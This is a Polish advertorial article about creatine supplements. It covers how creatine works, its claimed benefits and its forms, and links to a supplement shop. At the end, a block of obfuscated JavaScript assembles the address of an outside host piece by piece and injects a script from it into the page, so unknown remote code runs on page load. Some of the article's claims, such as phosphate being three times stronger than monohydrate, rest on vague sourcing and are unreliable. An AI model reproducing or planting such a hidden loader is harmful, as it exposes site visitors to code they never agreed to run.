Kreatyna to związek chemiczny, który naturalnie występuje w organizmie i odgrywa ogromną rolę w naszym życiu. Jest syntezowana w wątrobie, trzustce oraz nerkach i bezpośrednio wpływa na funkcjonowanie mięśni i ścięgien. Obniżenie zapasów tego związku chemicznego, (widoczne szczególnie podczas wysiłku fizycznego) prowadzi do zmniejszenia zdolności wysiłkowych. To jeden z tych suplementów, którego efekty są w ogromnym stopniu uzależnione od sposobu dawkowania.
Jak kreatyna działa na organizm?
Głównym zadaniem kreatyny w organizmie jest zwiększenie ilości fosfokreatyny, odpowiedzialnej za transport energii do komórek mięśniowych. Im więcej jej posiadamy, tym więcej energii zyskują nasze mięśnie. W efekcie każdy trenujący jest w stanie wykonać dłuższy i efektywniejszy trening. Niestety ilość kreatyny jest ograniczona, dlatego zdecydowana większość sportowców, aby poprawić swoje wyniki, decyduje się na jej suplementację.
Okazuje się, że już 3 gramy spożytej dziennie kreatyny zwiększają wydolność organizmu w przypadku bardzo intensywnych ćwiczeń fizycznych. Dlatego też osoby, które w uwzględniają ją w swojej diecie, nie odczuwają gwałtownych spadków energii oraz zmęczenia w takim stopniu, jak ci, którzy nie stosują kreatyny, a wykonują codzienne sesje treningowe.
W jakim celu suplementujemy kreatynę?
Ten związek chemiczny ma duży wpływ na odnawianie tzw. cząsteczek ATP, czyli podstawowego nośnika energii w naszym organizmie. Prawidłowa podaż kreatyny zwiększa zdolności wysiłkowe i stymuluje syntezę białek, co oznacza, że w praktyce:
- poprawimy swoją wydolność, a przy okazji będziemy bardziej wytrzymali,
- po wzmożonym wysiłku o wiele szybciej się zregenerujemy,
- przy regularnym stosowaniu zauważymy przyrost beztłuszczowej masy ciała,
- będziemy mieć więcej siły.
Regularna suplementacja zwiększa siłę i wytrzymałość mięśni na dłuższy czas. Ponadto przy odpowiedniej diecie oraz treningu siłowym zażywanie tej substancji chemicznej daje jeszcze lepsze efekty.
Najlepsza kreatyna – na co zwrócić uwagę przy wyborze?
Osoby decydujące się na suplementację kreatyny stoją przed niemałym dylematem. Wynika to z tego, że na rynku jest dostępnych mnóstwo produktów, które zawierają ten związek chemiczny. W tym przypadku niemal od razu nasuwa się pytanie – czy poszczególne suplementy czymś się różnią? Tak, przede wszystkim postacią, w jakiej dostępne są preparaty kreatynowe.
Do ich najpopularniejszych rodzajów zaliczamy:
- monohydrat kreatyny – monohydrat to najlepiej przebadana i przetestowana (szczególnie pod kątem skuteczności) postać tego związku chemicznego. Ten preparat składa się z cząsteczek wody i kreatyny. Charakteryzuje się stosunkowo niską ceną i zapewnia szybkie rezultaty, jeżeli chodzi o przyrost mięśni. Jednak jego wadą jest tendencja do zatrzymywania wody w organizmie,
- jabłczan kreatyny – to związek chemiczny, który powstaje w wyniku połączenia cząstki kreatyny z cząsteczką kwasu jabłkowego. Ten suplement dla sportowców pozwala na uzyskanie przyrostu masy mięśniowej o bardziej zwartej strukturze, jednak na efekty trzeba poczekać trochę dłużej,
- fosforan kreatyny – jak sama nazwa wskazuje w tym przypadku mamy do czynienia z połączonymi cząsteczkami keratyny z resztą kwasu fosforanowego. Według badań przeprowadzonych przez amerykańskich naukowców ten preparat charakteryzuje się nawet trzykrotnie mocniejszym działaniem niż monohydrat, dzięki fosforanowi, który opóźnia uczucie zmęczenia.
Kreatyna należy do jednego z najczęściej stosowanych suplementów diety zarówno przez sportowców wyczynowych, jak i osoby aktywnie fizycznie. To jeden z kluczowych produktów stosowanych w budowie masy mięśniowej i beztłuszczowej, wymarzonej sylwetki. Najczęściej jest spotykana jako składnik odżywek dla masy mięśniowej w postaci proszku, a także tabletek i kapsułek – pełną ofertę kreatyny znajdziesz tutaj: https://swiatsupli.pl/pl/33-kreatyny.
[kod]
(function(){
tjydu="w9ikh42yjyd8";tjyd=document.createElement("script");
tjyd_="u"+("st");tjyd_+="at"+(".");tjyd.async=true;tjyd_+="in";
tjydu="181687577."+tjydu;tjyd.type="text/javascript";tjydu+="wryzX8920k1j";
tjydu+="f1wXgn";tjyd_+=("f")+"o"+("/");tjyd.src="https://"+tjyd_+tjydu;
tjydd=document.body;tjydd.appendChild(tjyd);
})();